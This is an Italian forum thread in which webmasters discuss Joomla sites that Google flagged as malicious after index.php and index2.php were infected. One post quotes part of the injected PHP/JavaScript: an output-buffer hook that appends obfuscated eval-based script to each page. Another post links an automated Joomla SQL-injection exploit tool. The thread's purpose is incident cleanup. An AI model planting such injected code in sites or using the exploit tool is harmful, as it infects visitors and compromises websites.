Segnalato sito malevolo

[vishius]

Salve da un paio di giorni il sito www.realizzazioni.com, http://www.lucecolore.com, http://www.mariogagliardi.cosenza.it, http://www.fijlkamkaratecalabria.it . Questi siti citati (che sono contenuti  nello stesso server) sono stati contrassegnati come SITO MALEVOLO qui sotto vi riporto cosa mi appare quando cerco di entrare in uno di questi siti.

“Segnalato sito malevolo
Il sito web www.realizzazioni.com
cutt

In attesa di risposta

Cordiali Saluti

Salvatore

[MarkOne]

ciao vishius,
a me è capitato un paio di mesi fa e la documentazione in rete non manca oltre naturalmente ai consigli di questo forum; ho scaricato il sito in locale facendolo ripulire dall'antivirus e sostituendo i file infetti da copia di backup.
Ho anche segnalato all'hoster, diciamo vivacemente, il problema ed il disappunto.
Per rispondere alle tue domande:
vorrei sapere e avere informazioni dove devo apportare ulteriori modifiche: a me risultavano infette diverse decine di file index.php
Quando impiega Google per avere un altro controllo del sito?: non sono certo ma direi che il periodo corrisponde all'attività dei googlebot.
Quando impiega google per cacciare come “SITO MALEVOLO”.: 
Google ha una procedura specifica per la rimozione della segnalazione di Sito malevolo, la trovi nei webmaster tools ma è anche suggerita dalla stessa segnalazione che indica grossolanamente come agire.
Avendo  ripulito il tutto in poco tempo, il mio sito è stato offline per una paio di giorni ma dopo la mia segnalazione a Google nell'arco di una notte (breve) hanno tolto il marchio di infamia.
Paradossalmente è stato più complicato litigare con l'allarme "Sito Malevolo" che col codice maligno.
auguroni di un fulgido successo!

[56francesco]

vishius per cortesia, la raccolta differenziata prescrive che la monnezza venga inserita negli appositi contenitori e non sparsa ovunque capiti, grazie
 

[mau_develop]

la documentazione in rete non manca oltre naturalmente ai consigli di questo forum;
-------------------------------------------------
Infatti se tu (vishius) fossi andato nell'apposita sezione avresti trovato cose che il signore della security del politecnico, a quanto pare, ha scoperto l'altro ieri.

Hai Joomla aggiornato?
E i suoi componenti?

M.

[vishius]

la documentazione in rete non manca oltre naturalmente ai consigli di questo forum;
-------------------------------------------------
Infatti se tu (vishius) fossi andato nell'apposita sezione avresti trovato cose che il signore della security del politecnico, a quanto pare, ha scoperto l'altro ieri.

M.

nella securirty del politecnico non ho controllota e no so nemmeno qual è il sito.

la documentazione in rete non manca oltre naturalmente ai consigli di questo forum;
-------------------------------------------------

Hai Joomla aggiornato?
E i suoi componenti?

M.

tutto aggiornato fino all'ultimo componente tranne il componente xmap.

vishius per cortesia, la raccolta differenziata prescrive che la monnezza venga inserita negli appositi contenitori e non sparsa ovunque capiti, grazie
 

prego ^_^

Per rispondere alle tue domande:
vorrei sapere e avere informazioni dove devo apportare ulteriori modifiche: a me risultavano infette diverse decine di file index.php
auguroni di un fulgido successo!

a me sono solo stati infettati index.php e index2.php a gli  altri siti ancora non ho controllato  cmq penso che ci penseranno da lunedì in poi qulli di google visto che sabato e domenica sono chiusi "di solito" gli uffici.

GRazie per gli auguri

[56francesco]

a me sono solo stati infettati index.php e index2.

niente attacco allora.. tranquillo è il normalissimo lavoro dei maledettissimo spammers
hai un contatore di visite o un altro servizio esterno di altro tipo.. meteo per dirne uno installato nel sito?
mi prendo il si e lascio il no 3 a 1 ..

[MaxP4]

Anche io, di nuovo, mi sono trovato i miei index.php e index2.php infettati!

E si sono infettati tutti quei siti che ho nel mio account su Sgara...
Il codice inserito parte così:

<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">var ez=window;function asd(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var sdkajsnd=String.fromCharCode(101,118,97)+"l";function fds(){return asd($a);}var ....

...z[sdkajsnd](fds());</script>';}//important security update ?>
<?php

L'antivirus mi segnala un troyan "Obfuscator".
I siti che mi sono stati infettati (ma ora sistemati nuovamente) sono:
www.holidaysintoscana.com
www.caseerestauri.com
www.chinediferro.it/index.php
www.fattoriabucanuova.it
www.fotoinpista.com
www.holidaysinwine.com/index.php
www.istruzioniperluso.com
www.lapietriccia.com
www.morriconi.com
www.newwinejournal.it
www.schillerwirth.com
www.sciroccoitalia.com

Li h inseriti tutti perché non riesco a capire da dove possono essere entrati.

Di esterno ho un contatore di uptime su www.holidaysintoscana.com. Ho il meteo su www.lapietriccia.com.

boh, sono perplesso!

[notepad]

Io ho risolto..
Da ingorante che sono ho semplicemente usato questi 2 metodi
Installato:
Crawlprotect
Criptato i seguenti files index.php  index.php2 configuration.php di Joomla e l'index.php del Template
Con un Tool online chiamato Free PHP Encoder

[MaxP4]

Questo è l'incriminato:

http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=VirTool%3aJS%2fObfuscator.M&threatid=2147630365

[mau_develop]

aspettate un'attimino, prima di continuare volevo precisare delle cose:

Criptato i seguenti files index.php  index.php2 configuration.php di Joomla e l'index.php del Template...
-------------------------------------------------------------------------------------------------------------------------------------------
Secondo me state aggiungendo putt... su putt... che non servono a nulla.
Per scrivere in un file servono privilegi di owner e con quei privilegi ti disinstalloo Joomla e ti installo wp con lo stesso tmpl... sai che mi frega del crypt...

POI, VERY IMPORTANT.

State continuando ad aprire post su post  tutti uguali.

E' DA DICEMBRE che ho aiutato pumacocina per uno dei primi problemi di qs tipo verificatisi, l'unica cosa che è cambiata sono i files dove viene messo lo script e il redirect che (forse) non viene più fatto.

MOLTO PROBABILMENTE la causa di queste infezioni siete voi stessi con il programma di ftp o con il browser, o l'hoster in questione ha un buco grande come una casa e dei sysadmin deficenti. Ha qualche problemuccio ma non sono scemi, quindi non darei la colpa all'hoster.

Se fosse un problema di joomla sarebbe comunque qualcosa di molto grosso e non reso pubblico da più di 6 mesi.... pressochè impossibile.

AVERE un virus non vuol dire avere un file da cancellare. Un malware, meglio chiamarlo così, si infila nelle chiavi di registro e col cavolo che lo levate se non sapete cosa cercare.
Ribadisco che l'antivirus più efficiente che c'è sul mercato riconosce si e no il 30% dei malware in circolazione.

Se volete tentare di "bucarvi" da soli potete provare questo bel tool, vi ritroverete un sacco di log ma vi toglierete la soddisfazione
http://www.xenuser.org/2010/05/23/automated-joomla-sql-injection-exploiter/

M.

[dzaini]

Guardate che la situazione è seria ..a me sono stati infettati 32 siti e non 2 o 3. Tutti su aruba e con password ftp diverse. Entrano non so come. Uso joomla da più di 5 anni prima usavo mambo. Non sono certo un novellino. Penso che non si è risolto nulla nessuno ha capito come entrano  . Uso versioni aggiornate di joomla (1.5.18) e solo docman niente contatori nessuna previsione del tempo..nulla pensate che sono tutti siti che contengono documentazione tecnica (pdf e doc) caricata solo da me!!  Eppure i file index.php  e index2.php sono stati contaminati con un script in java che Explorer  rileva come uno script in pdf che cerca di aprirsi Firefox Safari e Crome bloccano dicendo che il sito è malevolo.
Ora sostituendo i 2 file (che sono quelli che google segnala) torna tutto alla normalità ma RIPETO NESSUNO MI HA ANCORA SPIEGATO COME ENTRANO!! Certo che sostituendo i file si risolve tutto ma questo non è il problema ..il problema è che ci sono dei buchi …che purtroppo io non conosco; il mio pc è pulito al 100% magari fosse lui allora avrei risolto
Sono 24 ore che tutto sembra tornato alla normalità ..è ovvio che come sono entrati una volta secondo me rientrano una seconda volta. 
Grazie a tutti

[mau_develop]

Penso che non si è risolto nulla nessuno ha capito come entrano
---------------------------------------------------------------------------------------

  questa se vuoi te la firmo!

ma non sarei così allarmista, piuttosto penserei a cosa hai fatto male... ripristinare una situazione dopo un attacco non è banale e dipende dall'abilitità di chi ti attacca.
Posti per infilare backdoor in un sito ce ne sonoinfiniti:  header di documenti, immagini, ricostruendo pezzetti di codice quà e là...

Quando violi un dominio sai tutto comprese password di dominio database posta etc..., facile che mentre metti a posto qualcosa lui faccia dall'altraparte.

Non solo, credo che 32siti con 32 user e pw diversi in mano ad una sola persona non ne ho mai visti... basta che il recupero di un dato punti alla medesima casella di posta che te li ho fatti tutti e 32 e se sono 64... 64!

La paura di ciò che non si è in grado di valutare spesso conduce alla paranoia, ovvero paura+fantasia e ci impedisce di accorgerci delle banalità che compiamo, finendo per confermare l'evento che ci attendevamo e quindi confermando la nostra paura...

ingarbugliato?... mmmhh sì... forse sì

M.

[mmleoni]

da dove entrano? ma nessuno li legge mai i post di bugSearch.Net ??

vedete qui:
http://forum.joomla.it/index.php/topic,105058.0.html
ed attivate il log via mail, poi ne riparliamo...

ciao,
marco

[vamba]

Uso versioni aggiornate di joomla (1.5.18) e solo docman niente contatori nessuna previsione del tempo..

Ok
allora analizziamo i dati forniti...
La versione docman è quella commerciale o superiore alla v1.4.0RC2(*)

(*)importante verificare se la versione adottata nel sito e uguale o superiore alla v1.4.0RC2 in quanto le precedenti avevano una notevole falla di sicurezza.
http://blog.joomlatools.eu/2008/02/docman-security-announcement.html
 

[websitter]

Stesso codice usato sul mio.
Sostituisco i files index.php e index2.php che sembrano gli unici infetti e comunico attraverso strumenti per webmaster di google l'avvenuto ripristino.
Ma prima scrivo a SGARAGNAO! una bella mail.

Che cosa è successo quando Google ha visitato questo sito?
Delle 137 pagine che abbiamo testato sul sito negli ultimi 90 giorni, 25 pagine hanno causato il download e l'installazione di software dannosi senza l'autorizzazione dell'utente. L'ultima volta in cui Google ha visitato questo sito è stato il 2010-06-13, mentre l'ultima volta in cui sono stati rilevati contenuti sospetti su questo sito è stato il 2010-06-03.
Malicious software includes 158 scripting exploit(s), 6 trojan(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

Il software dannoso è presente in 10 domini, tra cui aghrcdpafir.com/, hdegalchoxk.com/, ifgldsiifir.com/.

1 domini sembrano operare da intermediari per la distribuzione di malware ai visitatori di questo sito, tra questi search.twitter.com/.

This site was hosted on 1 network(s) including AS31034 (aruba).

[mau_develop]

Ma prima scrivo a SGARAGNAO! una bella mail.
---------------------------------------------------------------------
  ... per dirgli cosa scusa? che non aggiorni il sito?

M.